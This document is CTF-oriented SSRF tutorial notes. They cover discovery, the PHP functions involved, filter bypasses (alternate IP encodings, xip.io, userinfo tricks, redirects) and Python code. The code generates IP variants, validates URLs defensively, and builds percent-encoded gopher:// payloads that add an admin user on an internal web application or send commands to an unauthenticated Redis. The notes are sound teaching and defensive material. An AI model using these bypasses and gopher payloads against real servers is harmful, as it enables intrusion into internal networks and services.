CTF SSRF (Server-Side Request Forgery)
First, the concept
SSRF (Server-Side Request Forgery) is a vulnerability in which the attacker forges a request that the server itself initiates. Because the request leaves from the server, it can reach targets the client cannot: loopback services, the internal network behind the server, and hosts that only trust the server's address.
Any feature that lets external input make the server send a request to the internal network may contain an SSRF vulnerability.
Second, the harm
- 1. Scan the internal network the server sits in and the server's own local ports, and obtain banner information from some services
- 2. Attack applications running on the internal network or on the server itself (e.g. overflow vulnerabilities)
- 3. Fingerprint internal web applications by requesting their default files
- 4. Attack web applications on the internal and external network, mainly attacks that can be delivered through GET parameters (e.g. Struts2 exploits, SQL injection)
- 5. Read local files via the file:// protocol
Third, vulnerability discovery and judgment
- Look at the web functionality
  - Sharing: share web content by submitting a URL
  - Transcoding services: fetch the content at a URL and adapt it for browsing on a phone screen
  - Translation: translate the text content found at a URL
  - Image loading and downloading: load or download an image from a URL
  - Undisclosed API functions and any other call that takes a URL
- Look at URL parameter keywords
  - share, wap, url, link, src, source, target, u, 3g, display, sourceURL, imageURL, domain
- Basic judgment
  - With echo (the fetched content comes back in the response)
    - Direct observation of the response
    - Packet capture
  - Without echo (blind)
    - Monitor for the incoming request on a VPS you control
    - Delay (time differences between open and closed ports, or a deliberately slow endpoint)
    - DNS requests (point the URL at a domain whose DNS lookups you log)
Fourth, related functions
The PHP functions that most often sit behind an SSRF:
file_get_contents: fetches the content of a URL or file; supports whichever stream wrappers are enabled in PHP (file://, php://, http:// and others)
fsockopen: opens a raw socket to a host and port, so the attacker-chosen target receives whatever bytes the script writes
curl_exec: performs the request on a cURL handle; libcurl supports many protocols (gopher, dict, file, ...) depending on how it was built
Fifth, IP bypass
- Add a port
  For example: 192.168.200.9:80
- Short URL
  Use a short-link service that 302-redirects to the destination URL
- Domains that resolve to any IP: xip.io
  Example: 10.0.0.1.xip.io resolves to 10.0.0.1
- Alternative representations of the IP address
  - Decimal
  - Octal
  - Hex
  - Different combinations of these base conversions within one address
- 302 redirect
- Combining other protocols
  dict://
  file://
  gopher://
- Userinfo and trailing parameters
  http://A.com@10.10.10.10 is equivalent to accessing 10.10.10.10: A.com is only the userinfo part of the URL, but a filter that picks out the first host-like string sees A.com
  http://A.com?xxx=xx: append useless parameters after the URL to bypass naive matching
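The following is an added example, not code from the original notes, that ties the "related functions" section to the bypasses above: it shows the alternative spellings of an address that the C library's inet_aton accepts (and therefore curl, fsockopen and most native clients), why a substring blocklist misses them, and what a check that canonicalises the host the way the OS does looks like. The substring blocklist, the `is_safe_target` function and the resolver stub are assumptions for the demonstration; the fake DNS table standing in for xip.io is constructed.

```python
import ipaddress
import re
import struct
from typing import Callable, Dict, List, Optional
from urllib.parse import urlsplit

# One dot-separated component as inet_aton reads it: hex (0x...), octal
# (leading 0) or decimal. "08" matches nothing and is rejected, as in C.
_PART = re.compile(r"0[xX][0-9a-fA-F]*|0[0-7]+|0|[1-9][0-9]*")


def ip_variants(dotted: str) -> Dict[str, str]:
    """Alternative spellings of a dotted-quad IPv4 address that inet_aton accepts."""
    octets = [int(o) for o in dotted.split(".")]
    as_int = struct.unpack("!I", bytes(octets))[0]
    return {
        "dotted": dotted,
        "decimal": str(as_int),                              # 127.0.0.1 -> 2130706433
        "octal": ".".join(f"0{o:o}" for o in octets),         # 0177.00.00.01
        "hex": f"0x{as_int:08x}",                            # 0x7f000001
        "dotted_hex": ".".join(f"0x{o:x}" for o in octets),   # 0x7f.0x0.0x0.0x1
        "short": f"{octets[0]}.{(octets[1] << 16) | (octets[2] << 8) | octets[3]}",  # 127.1
    }


def inet_aton_compat(text: str) -> Optional[str]:
    """Parse an IPv4 literal the way BSD/glibc inet_aton does: up to four parts,
    each decimal, octal or hex, the last part filling all remaining bytes.
    Returns the canonical dotted quad, or None if the text is not an IPv4 literal."""
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values: List[int] = []
    for part in parts:
        if not _PART.fullmatch(part):
            return None
        if part[:2].lower() == "0x":
            values.append(int(part[2:] or "0", 16))
        elif len(part) > 1 and part[0] == "0":
            values.append(int(part, 8))
        else:
            values.append(int(part, 10))
    *leading, last = values
    if any(v > 255 for v in leading):
        return None
    tail_bytes = 4 - len(leading)
    if last >= 1 << (8 * tail_bytes):
        return None
    as_int = 0
    for v in leading:
        as_int = (as_int << 8) | v
    as_int = (as_int << (8 * tail_bytes)) | last
    return str(ipaddress.IPv4Address(as_int))


def naive_filter_allows(url: str) -> bool:
    """The kind of check the bypasses in this section defeat: substring matching
    on the raw URL string (assumed blocklist)."""
    blocked = ("127.0.0.1", "localhost", "10.", "172.16.", "192.168.")
    return not any(b in url for b in blocked)


def is_safe_target(url: str, resolve: Callable[[str], List[str]] = lambda host: []) -> bool:
    """Hardened check (assumption): parse the URL, canonicalise the host as the OS
    would, and allow only public unicast addresses. `resolve` maps a hostname to
    its addresses; the default resolves nothing, so non-literal hosts are rejected
    and the function stays offline. Every 3xx hop must be re-checked with this same
    function, so fetch with redirects disabled and follow them yourself."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):   # no gopher://, dict://, file://
        return False
    host = parts.hostname                        # userinfo (A.com@) and :port are stripped here
    if not host:
        return False
    canonical = inet_aton_compat(host)
    addresses = [canonical] if canonical else resolve(host)
    if not addresses:
        return False
    return all(ipaddress.ip_address(a).is_global for a in addresses)


if __name__ == "__main__":
    for name, spelled in ip_variants("127.0.0.1").items():
        url = f"http://{spelled}/"
        print(f"{name:10} {url:26} naive allows={naive_filter_allows(url)!s:5} "
              f"OS sees {inet_aton_compat(spelled)}  safe={is_safe_target(url)}")
    # Constructed DNS table standing in for a wildcard service such as xip.io.
    fake_dns = {"10.0.0.1.xip.io": ["10.0.0.1"], "public.example": ["8.8.8.8"]}
    lookup = lambda host: fake_dns.get(host, [])
    print(is_safe_target("http://10.0.0.1.xip.io/", lookup))   # False
    print(is_safe_target("http://A.com@10.10.10.10/"))          # False
```

Two caveats the check alone does not cover: a hostname that resolves to a public address at check time can resolve to an internal one when the client connects (DNS rebinding), so connect to the address you validated rather than resolving again; and the 302 and short-URL bypasses only work when the client follows redirects automatically, which is the default in curl with CURLOPT_FOLLOWLOCATION and in most HTTP libraries.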
Sixth, the Gopher protocol
Gopher is an Internet protocol for distributed document search and retrieval that predates HTTP: a client connects to a TCP port, sends a selector string followed by CRLF, and reads whatever comes back.
Because the selector is written to the socket verbatim after percent-decoding, a gopher:// URL can carry an arbitrary TCP payload, which is why it supports GET and POST requests: capture the GET or POST request packet first, percent-encode it, and place it in the gopher URL. For SSRF, gopher is the most powerful protocol, since it turns a single server-side request into an attack on any text-based internal TCP service.
Using the gopher protocol greatly expands the attack surface.
1. Limitations
- Check in phpinfo() which protocols the server's cURL build supports; gopher may be absent or disabled
- The target service must accept unauthenticated input, e.g. a database with no password
2. Constructing the payload
https://github.com/tarunkant/Gopherus
https://github.com/swisskyrepo/SSRFmap
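As an added example (not code from the notes or from Gopherus/SSRFmap), this shows what those tools do when they construct a payload: build the raw bytes of a captured HTTP POST or of Redis commands, percent-encode them into a gopher:// URL, and show the bytes a gopher client such as curl actually writes to the socket. The internal admin application at 192.168.1.10 and the password-less Redis on 127.0.0.1:6379 are assumed targets; nothing is sent on the network.

```python
from urllib.parse import quote, unquote_to_bytes, urlsplit


def to_gopher_url(host: str, port: int, payload: bytes) -> str:
    """Wrap raw bytes as gopher://host:port/_<percent-encoded payload>.
    The '_' is a dummy gopher item-type character: the client strips it and
    sends the rest of the selector, percent-decoded, followed by CRLF.
    Everything (CR, LF, '*', '$', spaces) is encoded so the bytes survive
    URL parsing intact."""
    return f"gopher://{host}:{port}/_{quote(payload, safe='')}"


def wire_bytes(gopher_url: str) -> bytes:
    """What a gopher client writes to the socket for this URL: the selector
    after the one-character item type, decoded, plus the protocol's CRLF."""
    path = urlsplit(gopher_url).path          # "/_%2A1%0D%0A..."
    return unquote_to_bytes(path[2:]) + b"\r\n"


def build_http_post(host: str, path: str, body: str) -> bytes:
    """A complete HTTP/1.1 POST as it would look in a packet capture, with the
    Content-Length computed from the body; this is the request the gopher URL
    replays against an internal web application."""
    body_bytes = body.encode()
    head = "\r\n".join([
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body_bytes)}",
        "Connection: close",
        "",
        "",
    ])
    return head.encode() + body_bytes


def resp_encode(*args: str) -> bytes:
    """Encode one Redis command in RESP, the protocol a Redis server speaks.
    A password-less Redis on the loopback accepts these from anyone who can
    reach the port, which is exactly what SSRF over gopher provides."""
    chunks = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        chunks.append(f"${len(raw)}\r\n".encode() + raw + b"\r\n")
    return b"".join(chunks)


if __name__ == "__main__":
    # Assumed internal web application: replay a captured-style POST through gopher.
    post = build_http_post("192.168.1.10", "/admin/adduser", "user=ctf&role=admin")
    print(to_gopher_url("192.168.1.10", 80, post))
    # Assumed unauthenticated Redis on loopback: several commands in one payload.
    redis = resp_encode("SET", "ssrf_probe", "reached") + resp_encode("INFO", "server")
    url = to_gopher_url("127.0.0.1", 6379, redis)
    print(url)
    print(wire_bytes(url))
```

When the gopher URL is itself submitted through the vulnerable parameter (`?url=gopher://...`), the web application URL-decodes it once before handing it to cURL, so the payload has to be percent-encoded a second time; that is the "encode again" step the tools above print after generating a payload. The extra CRLF appended by the client is harmless to both HTTP and Redis.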